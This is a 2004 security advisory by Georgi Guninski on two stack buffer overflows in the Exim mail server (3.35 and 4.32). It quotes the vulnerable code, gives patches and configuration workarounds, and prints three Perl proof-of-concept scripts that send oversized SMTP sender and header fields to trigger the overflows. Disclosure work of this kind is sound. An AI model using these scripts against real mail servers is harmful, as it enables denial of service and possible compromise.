Two stack based buffer overflows exist in Exim 3.35. Both bugs need features enabled and are not in the default configuration. Proof of concept exploitation given.
353e702b40c92a2c6f894d544e776cf46bb65be439d7576759dac932b6645004<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>
Buffer overflows in exim, yet still exim much better than windows
</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2><span>Buffer overflows in exim, yet
still exim much better than windows</span></h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" nowrap="nowrap" width="16%"
bgcolor="#f1f0ef"><img src="logo2.gif" alt="cyrillic logo"> <br>
<a href="index.html">Home</a> <br>
<b>Security</b> <br>
<a href="browsers.html" class="sux">Internet Explorer</a> <br>
<a href="win2k.html" class="sux">Windows 2000</a> <br>
<a href="exploit.html">AIX</a> <br>
<a href="netscape.html">Netscape</a> <br>
<a href="misc.html">Misc</a> <br>
<b>Other</b> <br>
<a href="greets.html">Links</a> <br>
<a href="me.html">Services</a> <br>
<a href="menews.html">In the news</a> <br>
<a href="rand/index.html">Random stuff</a> <br>
<b>Contact</b> <br>
<a href="mailto:guninski@guninski.com">guninski@guninski.com</a></td>
<td valign="top" width="84%"> <div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #68, 2004<br>
<br>
Buffer overflows in exim, yet still exim much better
than windows<br>
<br>
Systems affected:<br>
two bugs in exim 3.35<br>
one of them present in exim 4.32<br>
<br>
Risk: Medium - not in default install<br>
Date: 6 May 2004<br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You may distribute it unmodified.<br>
You may not modify it
and distribute it
or distribute parts<br>
of it without the author's written permission - this especially
applies to<br>
so called "vulnerabilities databases" and
securityfocus, microsoft, cert<br>
and mitre.<br>
If you want
to link
to this
content use
the URL:<br>
<a href="http://www.guninski.com/exim1.html">http://www.guninski.com/exim1.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The information in this advisory is
believed to be true
though<br>
it may be false.<br>
The opinions expressed in this advisory
and program are my own and<br>
not of any
company. The usual
standard disclaimer applies,<br>
especially the fact that Georgi Guninski is not
liable for any damages<br>
caused by direct or indirect use
of the information or functionality<br>
provided by this advisory or
program. Georgi Guninski
bears no<br>
responsibility for content or misuse of
this advisory or program or<br>
any derivatives thereof.<br>
<br>
Description:<br>
<br>
There are two stack based overflows in exim 3.35. One them (bug1) is
easily<br>
exploitable. Ease of exploitation of the other one (bug2) is not clear,
but i<br>
won't be surprised if it is exploitable. Too lazy to check for sure.<br>
(bug2) is also present in exim 4.32.<br>
Both bugs are not in default exim configuration and need enabling
options.<br>
<br>
Details:<br>
<br>
bug1:<br>
in exim 3.35 in verify.c there are two occurences of:<br>
---<br>
<samp>sprintf(buffer, "%s:%.200s", sender_address,</samp><br>
---<br>
where buffer is on the stack.<br>
This is classic stack overflow.<br>
This bug works if works if "sender_verify = true" is in exim.conf<br>
To test for vulnerability:<br>
./exi1.pl | nc localhost 25<br>
then press enter.<br>
<br>
bug2:<br>
in accept.c for exim 3.35 and in verify.c for exim 4.32 there is:<br>
---<br>
<samp>char hname[64];<br>
char *t = h->text;<br>
char *tt = hname;<br>
char *verb = "is";<br>
int len;<br>
<br>
while (*t != ':') *tt++ = *t++;<br>
*tt = 0;</samp> <br>
---<br>
this code is hit if "headers_check_syntax" is in exim.conf for 3.35 and<br>
"require verify =
header_syntax" is in the .conf for 4.32<br>
the difficulty of exploiting this is that "t" can have limited content,<br>
but can have arbitrary length.<br>
<br>
To test for vulnerability for 3.35:<br>
./exi2.pl | nc localhost 25<br>
then press enter.<br>
<br>
To test for vulnerability for 4.32:<br>
./exi3.pl localhost 25<br>
<br>
Fix:<br>
<br>
Unofficial fix from me, but debian seems to agree with it.<br>
<br>
for exim 3.35<br>
for bug1:<br>
in verify.c<br>
find the following:<br>
sprintf(buffer, "%s:%.200s", sender_address,<br>
(sender_host_name != NULL)? sender_host_name :<br>
(sender_host_address != NULL)? sender_host_address : "");<br>
and<br>
sprintf(buffer, "%s:%.200s", sender_address,<br>
(sender_host_name != NULL)? sender_host_name :<br>
(sender_host_address != NULL)? sender_host_address : "");<br>
<br>
in both above cases replace "sprintf(buffer," with:<br>
"snprintf(buffer, sizeof(buffer),"<br>
<br>
for bug2:<br>
in accept.c find:<br>
while (*t != ':') *tt++ = *t++;<br>
and replace it with:<br>
while (*t != ':' && tt < &hname[sizeof(hname)-2]) *tt++
= *t++;<br>
<br>
for exim 4.32<br>
for bug2:<br>
in verify.c find <br>
while (*t != ':') *tt++ = *t++;<br>
and replace it with:<br>
while (*t != ':' && tt < &hname[sizeof(hname)-2]) *tt++
= *t++;<br>
<br>
Note: you need to change some addresses in the perls below.<br>
<br>
----exi1.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
# works if sender_verify = true is in exim.conf<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases or CVE<br>
print "HELO a\r\n";<br>
my $ch=getc();<br>
print "MAIL FROM: " . "v" x 300 ."\@vt" . "\r\n";<br>
print "RCPT TO: BillGay\@localhost\r\n";<br>
print "DATA\r\n";<br>
#print "From" . " " x 65 . ":" . "ff fff ff" ."\r\n";<br>
print "asdasd\r\n";<br>
print "\r\n";<br>
print ".\r\n";<br>
print "QUIT\r\n";</samp><br>
---------------------------------------------<br>
<br>
----exi2.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
# works if headers_check_syntax is in exim.conf<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases<br>
<br>
print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO:
SteveNoBall\@localhost\r\n";<br>
print "DATA\r\n";<br>
my $ch=getc();<br>
print "From" . " " x 275 . ":" ."vv v \r\n";<br>
print "asdasd\r\n";<br>
print "\r\n";<br>
print ".\r\n";<br>
print "QUIT\r\n";</samp> <br>
---------------------------------------------<br>
<br>
<br>
----exi3.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
<br>
use IO::Socket;<br>
<br>
my $port = $ARGV[1];<br>
my $host = $ARGV[0];<br>
<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases<br>
print "Written by georgi guninski\nCannot be used in vulnerability
databases or CVE\n";<br>
<br>
my $repl;<br>
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort
=> $port,Proto => "TCP") || die "socket";<br>
<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
my $req = "HELO a\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
<br>
my $fromaddr="BillGay\@soft";<br>
my $touser="SteveNoBall\@soft";<br>
<br>
$req = "MAIL FROM: ${fromaddr}\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
$req = "RCPT TO: ${touser}\r\n";<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
$req = "DATA\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
print "Attached with debugger to exim and press enter\n";<br>
my $ccc=getc();<br>
<br>
$req = "From" . " " x 200 . ":" ." root\r\n";<br>
<br>
$req .= "just to let you know that you sux\r\n";<br>
$req .= ".\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
<br>
<br>
while(<$socket>)<br>
{<br>
print $_;<br>
}<br>
<br>
<br>
close $socket;<br>
</samp> <br>
<br>
---------------------------------------------<br>
<br>
<br>
Workaround:<br>
for exim 3.35<br>
make sure you don't have the following options in exim.conf:<br>
---<br>
sender_verify = true<br>
headers_check_syntax<br>
---<br>
for exim 4.32<br>
make sure you don't have the following option in the config file:<br>
require verify =
header_syntax<br>
<br>
Vendor status:<br>
exim.org and debian are aware of the bugs<br>
<br>
Georgi Guninski<br>
http://www.guninski.com<br>
</div></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
<br>
<br>
<center>
<p>| <a href="index.html">Home</a> | <a href="browsers.html">Internet
Explorer</a> | <a href="win2k.html">Windows 2000</a> | <a
href="exploit.html">AIX</a> | <a href="netscape.html">Netscape</a> | <a
href="greets.html">Links</a> | <a href="index.html">More...</a> |</p>
</center>
<p><br>
</p>
<br>
<br>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed